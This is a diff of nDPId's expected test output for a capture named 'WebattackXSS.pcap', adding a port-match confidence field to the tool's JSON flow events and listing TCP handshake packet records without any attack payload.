-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347513353,"flow_last_seen":1499347518754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347638707,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57994,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347513353,"flow_last_seen":1499347518754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347638707,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57994,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347513353,"flow_last_seen":1499347518754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347638707,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57994,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":322,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347514648,"flow_last_seen":1499347519754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347638707,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58008,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":322,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347514648,"flow_last_seen":1499347519754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347638707,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58008,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":322,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347514648,"flow_last_seen":1499347519754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347638707,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58008,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5629,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":398,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347640199,"flow_last_seen":1499347640199,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347640199,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59354,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5629,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":398,"flow_packet_id":1,"flow_last_seen":1499347640199,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347640199,"pkt":"ABm5CmnxAMGxFOsxCABFAAA81CZAAD4G8amsEAABwKgKMufaAFCvK6yIAAAAAKACchChOwAAAgQFtAQCCAoBO3iuAAAAAAEDAwc="}
@@ -2256,15 +2256,15 @@
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5696,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":403,"flow_packet_id":1,"flow_last_seen":1499347647733,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347647733,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8cdhAAD4GU\/isEAABwKgKMugsAFDFxvHRAAAAAKACchA9qgAAAgQFtAQCCAoBO4AJAAAAAAEDAwc="}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5697,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":403,"flow_packet_id":2,"flow_last_seen":1499347647733,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347647733,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6CyQ1\/Exxcbx0qAScSBnHAAAAgQFtAQCCAoD5VF+ATuACQEDAwc="}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5699,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":403,"flow_packet_id":3,"flow_last_seen":1499347647734,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347647734,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0cdlAAD4GU\/+sEAABwKgKMugsAFDFxvHSkNfxMoAQAOUGJAAAAQEICgE7gAkD5VF+"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":323,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347517171,"flow_last_seen":1499347522754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347648759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58034,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":323,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347517171,"flow_last_seen":1499347522754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347648759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58034,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":323,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347517171,"flow_last_seen":1499347522754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347648759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58034,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":324,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347518410,"flow_last_seen":1499347523754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347648759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58048,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":324,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347518410,"flow_last_seen":1499347523754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347648759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58048,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":324,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347518410,"flow_last_seen":1499347523754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347648759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58048,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":325,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347519679,"flow_last_seen":1499347524756,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347648759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58062,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":325,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347519679,"flow_last_seen":1499347524756,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347648759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58062,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":325,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347519679,"flow_last_seen":1499347524756,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347648759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58062,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":326,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347522204,"flow_last_seen":1499347527756,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347648759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58088,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":326,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347522204,"flow_last_seen":1499347527756,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347648759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58088,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":326,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347522204,"flow_last_seen":1499347527756,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347648759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58088,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":327,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347523488,"flow_last_seen":1499347528757,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347648759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58102,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":327,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347523488,"flow_last_seen":1499347528757,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347648759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58102,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":327,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347523488,"flow_last_seen":1499347528757,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347648759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58102,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5715,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":404,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347650289,"flow_last_seen":1499347650289,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347650289,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59462,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5715,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":404,"flow_packet_id":1,"flow_last_seen":1499347650289,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347650289,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8qjtAAD4GG5WsEAABwKgKMuhGAFAFSiizAAAAAKACchDErAAAAgQFtAQCCAoBO4KIAAAAAAEDAwc="}
@@ -2286,17 +2286,17 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5769,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":408,"flow_packet_id":1,"flow_last_seen":1499347656622,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347656622,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83x1AAD4G5rKsEAABwKgKMuiKAFBnH1eqAAAAAKACchAtbQAAAgQFtAQCCAoBO4i3AAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5770,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":408,"flow_packet_id":2,"flow_last_seen":1499347656622,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347656622,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6Ios50nrZx9Xq6AScSBZZwAAAgQFtAQCCAoD5VotATuItwEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5772,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":408,"flow_packet_id":3,"flow_last_seen":1499347656624,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347656624,"pkt":"ABm5CmnxAMGxFOsxCABFAAA03x5AAD4G5rmsEAABwKgKMuiKAFBnH1erLOdJ7IAQAOX4bQAAAQEICgE7iLgD5Vot"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":328,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347524782,"flow_last_seen":1499347530758,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347658889,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58116,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":328,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347524782,"flow_last_seen":1499347530758,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347658889,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58116,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":328,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347524782,"flow_last_seen":1499347530758,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347658889,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58116,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":329,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347526155,"flow_last_seen":1499347531758,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347658889,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58130,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":329,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347526155,"flow_last_seen":1499347531758,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347658889,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58130,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":329,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347526155,"flow_last_seen":1499347531758,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347658889,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58130,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347527425,"flow_last_seen":1499347532758,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347658889,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58144,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347527425,"flow_last_seen":1499347532758,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347658889,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58144,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347527425,"flow_last_seen":1499347532758,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347658889,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58144,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347528679,"flow_last_seen":1499347533759,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347658889,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58158,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347528679,"flow_last_seen":1499347533759,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347658889,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58158,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347528679,"flow_last_seen":1499347533759,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347658889,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58158,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347531303,"flow_last_seen":1499347536759,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347658889,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58184,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347531303,"flow_last_seen":1499347536759,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347658889,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58184,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
